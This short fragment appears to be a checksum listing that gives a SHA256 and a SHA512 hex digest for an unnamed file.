SHA256339ea64179ba038b5fbe8994081a64aa6c0d4cdbbb4ceacb47de6ed7aa199ae6
SHA51224dc4487ed4469226a11f8c7ab6ffc7c1da09df5722fa78f87b5b3ef9ab3e48910c3aafeb5011ee77a011e9cf463dc40c18f9d2b47ecfc3c1e402d76a18d0b19